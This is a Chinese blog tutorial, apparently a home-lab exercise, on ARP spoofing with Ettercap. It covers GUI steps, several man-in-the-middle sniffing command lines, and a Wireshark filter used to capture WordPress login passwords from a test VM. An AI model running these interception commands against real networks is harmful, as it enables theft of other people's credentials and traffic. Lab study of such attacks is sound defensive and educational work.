使用ettercap进行arp攻击|内网嗅探

使用ettercap进行arp攻击|内网嗅探

image-20221011003710215

没什么好说的, 就是利用arp不进行任何身份验证便根据发送过来的信息更新本地arp缓存表从而导致的arp劫持(两头骗..)

arp欺骗

Ettercap

GUI界面引用的使用

命令行执行调用GUI界面

ettercap -G

然后选择虚拟机的网卡

image-20221008230316194

image-20221008230515768

将当前内网的主机扫描完成之后进行arp欺骗

  1. 添加受害主机的网关到Target1
  2. 添加受害主机到Target2
  3. 开启arp欺骗攻击

image-20221008230851692

image-20221008231028242

image-20221008230716016

image-20221008230906593

后面发现我的win8机器ip为192.168.92.134而不是之前添加的130, 所以多加了一个target2, 然后开始攻击(想要停止攻击的话点击开始攻击和菜单中间的按钮)

在win8中随便找个wordpress的网站登录一下就可以看到流量监控下抓取的密码了:

image-20221008232955204

默认的就是这样简单的流量抓取功能, 更多的可以通过菜单下的过滤器进行自己添加流量抓取规则, 也可以使用ettercap原有的插件

image-20221008233119949

命令行的使用

在上面的使用方法中我们可以直接通过gui界面使用工具, 另外也可以全部在命令行中完成操作

几个常用的参数组合:

ettercap -T -q -M ARP:remote -w network.pcap /192.168.0.1// /192.168.0.119//

其中-T代表文本模式,-q为安静模式(不在控制台输出监听的数据),-M为中间人攻击,-w指定的是存储到磁盘的网络数据包,可以使用Charles或Wireshark等工具进行分析。其中ip地址的格式,根据编译源码时CMakeList中指定的是否支持IPv6,分别为MAC/IP/IPv6/PORT或MAC/IP/PORT格式。

ettercap -Tzq

以命令行方式显示,只嗅探本地数据包,只显示捕捉到的用户名和密码以及其他信息。

ettercap -T -M arp:remote /192.168.1.1//192.168.1.2-10/

嗅探网关(192.168.1.1)与部分主机(192.168.1.2-10)之间相互通信的数据包。

ettercap -Tzq //110

只嗅探本机110端口(pop3)的信息

ettercap -Tzq /10.0.0.1/21,22,23

只嗅探本机与10.0.0.1主机在端口21、22、23上的通信

ettercap -i eth0 -Tq -L sniffed_data -Ffilter.ef -M arp:remote /10.1.1.2/80 //

在eth0网卡上用自己的filter嗅探ip为10.1.1.2主机在80端口上的所有通信,并把所有的数据包保存成文件名为“sniffed_data”的文件

ettercap -i eth0 -Tq -L sniffed_data -Ffilter.ef -M arp:remote /10.1.1.1/ /10.1.1.2/

单向欺骗路由,只劫持路由发向10.1.1.2的数据包。

参数说明

使用自定义的filter监听和篡改流量

个人感觉初始的流量监听只是它最基础的功能, 更多的应该是进行劫持以及流量篡改,在ettercap中就提供了大量的默认插件可以使用, 但是这些插件的作用我都还没有尝试, 就先在这里简单留个备注吧

更好用的工具

除了ettercap之外个人感觉还有一个更好用的工具cain, 图形界面做的更好,对功能的使用也更加方便,

此外还可以直接用wireshark, 它的功能也是非常强大的, 可以直接抓取整个网卡内网的流量

例如我在192.168.92.134的主机访问有wordpress服务的192.168.92.1并且在登录界面输入密码,那么我们就可以通过http && ip.src == 192.168.92.134的过滤确认请求包然后在里面直接看到传输的请求并直接从请求中拿到账号密码

2022_10_08 周六

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇